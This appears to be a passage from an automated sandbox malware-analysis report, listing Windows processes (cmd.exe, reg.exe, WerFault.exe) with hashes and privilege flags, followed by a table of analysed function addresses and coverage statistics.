Start date: | 06/10/2024 |
Path: | C:\Windows\SysWOW64\cmd.exe |
Wow64 process (32bit): | true |
Commandline: | |
Imagebase: | 0xa60000 |
File size: | 236'544 bytes |
MD5 hash: | D0FCE3AFA6AA1D58CE9FA336CC2B675B |
Has elevated privileges: | true |
Has administrator privileges: | true |
Programmed in: | C, C++ or other language |
Reputation: | high |
Has exited: | true |
Target ID: | 8 |
Start time: | 05:47:01 |
Start date: | 06/10/2024 |
Path: | C:\Windows\System32\conhost.exe |
Wow64 process (32bit): | false |
Commandline: | |
Imagebase: | 0x7ff7ab9d0000 |
File size: | 875'008 bytes |
MD5 hash: | 81CA40085FC75BABD2C91D18AA9FFA68 |
Has elevated privileges: | true |
Has administrator privileges: | true |
Programmed in: | C, C++ or other language |
Reputation: | high |
Has exited: | true |
Target ID: | 9 |
Start time: | 05:47:01 |
Start date: | 06/10/2024 |
Path: | C:\Windows\SysWOW64\reg.exe |
Wow64 process (32bit): | true |
Commandline: | |
Imagebase: | 0x880000 |
File size: | 59'392 bytes |
MD5 hash: | CDD462E86EC0F20DE2A1D781928B1B0C |
Has elevated privileges: | true |
Has administrator privileges: | true |
Programmed in: | C, C++ or other language |
Reputation: | high |
Has exited: | true |
Target ID: | 12 |
Start time: | 05:47:13 |
Start date: | 06/10/2024 |
Path: | C:\Windows\SysWOW64\WerFault.exe |
Wow64 process (32bit): | true |
Commandline: | |
Imagebase: | 0x760000 |
File size: | 482'640 bytes |
MD5 hash: | 40A149513D721F096DDF50C04DA2F01F |
Has elevated privileges: | true |
Has administrator privileges: | true |
Programmed in: | C, C++ or other language |
Reputation: | high |
Has exited: | true |
Target ID: | 15 |
Start time: | 05:47:45 |
Start date: | 06/10/2024 |
Path: | C:\Windows\SysWOW64\WerFault.exe |
Wow64 process (32bit): | true |
Commandline: | |
Imagebase: | 0x760000 |
File size: | 482'640 bytes |
MD5 hash: | 40A149513D721F096DDF50C04DA2F01F |
Has elevated privileges: | true |
Has administrator privileges: | true |
Programmed in: | C, C++ or other language |
Has exited: | true |
Execution Graph
Execution Coverage: | 23.7% |
Dynamic/Decrypted Code Coverage: | 0% |
Signature Coverage: | 20.8% |
Total number of Nodes: | 1320 |
Total number of Limit Nodes: | 32 |
Graph
Functions identified in the execution graph (every entry carries the COMMON tag; the per-function control-flow graph, API, string, memory-dump source, IDA plugin and similarity widgets are interactive and carry no data here):

| Function | Relevance | APIs | Strings | Instructions | Tags |
| 0040338F | 86.2 | 32 | 17 | 410 | string, file, com |
| 00405461 | 65.0 | 36 | 1 | 284 | window, clipboard, memory |
| 00404722 | 28.3 | 12 | 4 | 275 | string |
| 004065FD | 3.0 | 2 | - | 14 | file |
| 004039AA | 45.7 | 13 | 13 | 215 | string, registry |
| 004062DC | 19.5 | 7 | 4 | 209 | string |
| 0040176F | 14.1 | 5 | 3 | 145 | string, time |
| 00405322 | 14.1 | 7 | 1 | 72 | string, window |
| 00406624 | 10.5 | 3 | 3 | 36 | library |
| 00404ADE | 7.1 | 3 | 1 | 84 | string |
| 004058A3 | 5.3 | 2 | 1 | 24 | process |
| 00402032 | 4.6 | 3 | - | 73 | library |
| 00405C97 | 3.0 | 2 | - | 47 | string |
| 00401389 | 3.0 | 2 | - | 43 | window |
| 004053F5 | 3.0 | 2 | - | 32 | com |
| 00405DB0 | 3.0 | 2 | - | 16 | file |
| 00405D8B | 3.0 | 2 | - | 13 | - |
| 0040586E | 3.0 | 2 | - | 9 | - |
| 0040230C | 1.5 | 1 | - | 25 | - |
| 00405E62 | 1.5 | 1 | - | 22 | file |
| 00405E33 | 1.5 | 1 | - | 22 | file |
| 00404231 | 1.5 | 1 | - | 10 | - |
| 0040427D | 1.5 | 1 | - | 9 | window |
| 00403347 | 1.5 | 1 | - | 6 | - |
| 00404266 | 1.5 | 1 | - | 6 | window |
| 00404253 | 1.5 | 1 | - | 4 | - |
| 00401F06 | 1.3 | 1 | - | 37 | - |
| 004014D7 | 1.3 | 1 | - | 19 | sleep |
| 00404C9E | 63.5 | 33 | 3 | 481 | window, memory |
| 004059CC | 17.6 | 7 | 3 | 148 | file, string |
| 004072EC | 2.8 | - | 2 | 300 | - |
| 00402868 | 1.5 | 1 | - | 30 | file |
| 00406B15 | .3 | - | - | 334 | - |
| 004043F0 | 38.7 | 19 | 3 | 204 | window, string |
| 00405F06 | 21.1 | 10 | 2 | 130 | memory, string |
| 00404298 | 12.1 | 8 | - | 68 | - |
| 0040264A | 10.7 | 5 | 1 | 153 | file |
| 00404BEC | 10.5 | 5 | 1 | 48 | window |
| 00402DF3 | 10.5 | 5 | 1 | 40 | time |
| 00401DB9 | 7.5 | 5 | - | 43 | - |
| 00401D5D | 7.5 | 5 | - | 39 | window |
| 00401C1F | 7.1 | 3 | 1 | 84 | window, time |
| 00402598 | 7.1 | 3 | 1 | 69 | string |
| 00405B8F | 7.0 | 3 | 1 | 16 | string |
| 00402E79 | 6.0 | 4 | - | 33 | - |
| 00405296 | 5.3 | 2 | 1 | 46 | window |
| 00406188 | 5.3 | 2 | 1 | 44 | registry |
| 00405BDB | 5.3 | 2 | 1 | 16 | string |
| 00405D15 | 5.0 | 4 | - | 37 | string |
| 0305EAE0 | .3 | - | - | 258 | - |
| 0305EAF0 | .3 | - | - | 252 | - |
| 0305E280 | 2.6 | - | 2 | 52 | - |
| 0305E290 | 2.5 | - | 2 | 46 | - |
| 076ECAE6 | 1.4 | - | - | 1449 | - |
| 076E5230 | 1.1 | - | - | 1099 | - |
| 076E3878 | .9 | - | - | 904 | - |
| 076E520E | .9 | - | - | 893 | - |
| 076E469A | .9 | - | - | 888 | - |
| 076ED8C6 | .8 | - | - | 839 | - |
| 076E385A | .8 | - | - | 835 | - |
| 08FC16C8 | .7 | - | - | 678 | - |
| 076E4866 | .6 | - | - | 647 | - |
| 076EDA87 | .6 | - | - | 627 | - |
| 076E1228 | .6 | - | - | 599 | - |
| 076EDD1C | .4 | - | - | 435 | - |
| 076EDB11 | .4 | - | - | 431 | - |
| 076E4BB1 | .3 | - | - | 311 | - |
| 08FC1C24 | .2 | - | - | 206 | - |
| 08FC1C38 | .2 | - | - | 201 | - |
| 076E0C68 | .2 | - | - | 170 | - |
| 0305F748 | .2 | - | - | 155 | - |
| 0305F738 | .2 | - | - | 151 | - |
| 076E8A15 | .1 | - | - | 134 | - |
| 076E0AF0 | .1 | - | - | 120 | - |
| 076E5078 | .1 | - | - | 102 | - |
| 076E0FD0 | .1 | - | - | 94 | - |
| 076E0FB4 | .1 | - | - | 93 | - |
| 0305E4C1 | .1 | - | - | 89 | - |
| 0305E4D0 | .1 | - | - | 84 | - |
| 0305E389 | .1 | - | - | 82 | - |
| 0305E5F8 | .1 | - | - | 82 | - |
| 0305C010 | .1 | - | - | 79 | - |
| 0305E398 | .1 | - | - | 77 | - |
| 08FC3D39 | .1 | - | - | 75 | - |
| 0305C020 | .1 | - | - | 69 | - |
| 0305F577 | .0 | - | - | 47 | - |
| 0305F588 | .0 | - | - | 44 | - |
| 0305BCF7 | .0 | - | - | 35 | - |
| 0305BD77 | .0 | - | - | 33 | - |
| 0305C162 | .0 | - | - | 31 | - |
| 0305BD08 | .0 | - | - | 31 | - |
| 0305B592 | .0 | - | - | 30 | - |
| 0305E5E8 | .0 | - | - | 26 | - |
| 0305BD88 | .0 | - | - | 25 | - |
| 0305FDDB | .0 | - | - | 25 | - |
| 0305B5A0 | .0 | - | - | 24 | - |
| 0305C170 | .0 | - | - | 23 | - |
| 0305B360 | .0 | - | - | 20 | - |
| 0305B429 | .0 | - | - | 20 | - |
| 0305FDF0 | .0 | - | - | 16 | - |
| 0305B370 | .0 | - | - | 15 | - |
| 0305B438 | .0 | - | - | 15 | - |
| 0305F958 | .0 | - | - | 10 | - |
| 076E1CB6 | .0 | - | - | 5 | - |
| 03057711 | .8 | - | - | 777 | - |
| 03054753 | 5.1 | - | 4 | 116 | - |